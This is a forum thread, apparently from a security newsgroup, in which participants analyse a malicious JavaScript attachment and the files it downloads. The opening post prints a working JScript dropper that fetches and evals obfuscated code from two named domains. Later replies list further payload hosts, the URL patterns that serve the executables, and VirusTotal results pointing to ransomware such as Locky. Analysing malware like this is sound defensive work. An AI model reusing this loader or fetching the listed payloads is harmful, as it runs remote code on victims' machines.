Looks harmless enough

[Virus Guy]

Looks harmless enough:

var z1 = "Msxml2.XMLHTTP"; var m =
"rRJ-9BCo_j7r5qhkiCr8-rk5YjGOxEz6fHKRS4iRecpYZvsAZ96JLAqO4wEAjAAuimMx4pdoRfco9Eh8xivqlG-3SIRDdjM-KQ0";
var x = new Array("sobrspot.com","romiecoston.com"); var z4 = "a"; for
(var i=0; i<x.length; i++) { var e = new ActiveXObject(z1); try {
e.open("GET", "http://"+x[i]+"/counter/?"+m, false); e.send(); if
(e.status == 200) { var z3 = e.responseText; var z3 = z3.split(m); var
z3 = z3.join(z4); eval(z3); break; }; } catch(e) { }; };

What's it do?

[Ant]

"Virus Guy" wrote:
> What's it do?

Runs scripts at sobrspot.com and romiecoston.com which try to download
and run two executables from one of these domains:

azlivesound.com
bathsaltsboutique.com
haroldsowls.com
natureprintsfloors.com
netmix360.com
ocassmarket.com
revitconstruction.ca
wspace.whitespaceco.com

The first is about 303 KB and the second about 360 KB in size.

No idea what they are but ransomware is vey common these days.

I don't have time but if someone wants to play with them:

hxxp://[domain]//counter/?1
hxxp://[domain]//counter/?2

[Virus Guy]

In other words:

http://[domain]/counter/?1 (or /?2)

Turns out that this also works:

http://[domain]/counter/?3

Gives you a 44 kb file. And it doesn't matter which domain you try -
you'll always get the same 303 or 357 or 44 kb file. /?4 doesn't give
you anything.

Here's a scan of the 44 kb file:

https://www.virustotal.com/en/file/4ed142ac450d0ea86e0e31c46b1ca928bde991a7432dd6a0c2c3d79833ccac95/analysis/1486907362/

This is surprising:

First submission 2010-07-03 09:04:07 UTC ( 6 years, 7 months ago )

Here's the scan for the 303 kb file:

https://www.virustotal.com/en/file/ea103416ceaaea9273470e5c9a2b579b13c7fdd60b7f6a0a47296c838c842ed2/analysis/1486907755/

This was the first submission for that file. Detection rate 17/58. I'm
seeing Locky being thrown around here. I think Trend is calling it
KOVTER (?).

Here's the scan for the 357 kb file:

https://www.virustotal.com/en/file/2c44eff2971cee7400f508f5683d14b5613096db568ff4b1835fcfc86c60ad62/analysis/1486907933/

And this was also the first time it was seen. Detection rate 9/57.

The detections of this file don't seem to give it a name - the
detections just seem to generic "this looks suspicious so I'll flag
it". Unless GenKryptik and WisdomEyes are actual malware names.

[Ant]

"Virus Guy" wrote:
> Turns out that this also works:
> http://[domain]/counter/?3
> Gives you a 44 kb file.

[...]

> This is surprising:
> First submission 2010-07-03 09:04:07 UTC ( 6 years, 7 months ago )

Indications are that this is not malware and does what it says on the
tin: "PHP Script Interpreter" and "Copyright (c) 1997-2008 The PHP
Group". It imports functions from php4ts.dll, a PHP library not found
by default on Windows machines. There are no strange or obuscated
sections. It's a command-line program and even has usage help.

[FromTheRafters]

Ant has brought this to us :

I got a PNG file with an MZ header.

VT already had it.

https://www.virustotal.com/en/file/c06bf06b12b93473537d29b8f3d6f84a29e689bbd5d68d61f474c7040762becd/analysis/

[Shadow]

I got two *.png files.
Wondering what NEW vulnerability they'd use to execute. Did
nothing in my Firefox 17 .............
[]'s
--
Don't be evil - Google 2004
We have a new policy - Google 2012

[FromTheRafters]

Shadow presented the following explanation :

One of the AV detections used a CVE designation and I followed that
lead. Today I can't remember the vulnerabiity but IIRC it was from
2012.

[David B.]

Have you been poorly, FTR?

--
"Do something wonderful, people may imitate it." (Albert Schweitzer)